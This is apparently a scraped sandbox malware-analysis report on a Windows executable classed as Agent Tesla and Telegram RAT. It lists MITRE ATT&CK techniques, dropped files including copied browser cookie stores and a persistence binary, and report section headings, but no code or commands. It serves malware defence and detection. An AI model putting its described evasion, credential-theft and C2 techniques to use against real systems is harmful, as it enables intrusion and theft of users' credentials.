Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PO54782322024.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_PO54782322024.ex_dcd7f1e6b43c682bb4e94b19bfbd88ec14898fb_b094706f_5b650f41-ff8d-4bf4-b531-59e380231bfd\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3F0B.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER41BC.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4278.tmp.xml

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppPoint.exe.log

C:\Users\user\AppData\Roaming\54jrhssx.hnx\Chrome\Default\Network\Cookies

C:\Users\user\AppData\Roaming\54jrhssx.hnx\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite

C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe

C:\Windows\appcompat\Programs\Amcache.hve

\Device\ConDrv

Windows Analysis Report
PO54782322024.exe

Function 00007FFD9B872A2C Relevance: 1.7, Strings: 1, Instructions: 480
COMMON

Function 00007FFD9B87D34D Relevance: 1.6, Instructions: 1590
COMMON

Function 00007FFD9B87BC7A Relevance: .7, Instructions: 706
COMMON

Function 00007FFD9B870D60 Relevance: 1.8, APIs: 1, Instructions: 262
COMMON

Function 00007FFD9B871A52 Relevance: 1.6, APIs: 1, Instructions: 146
memoryCOMMON

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre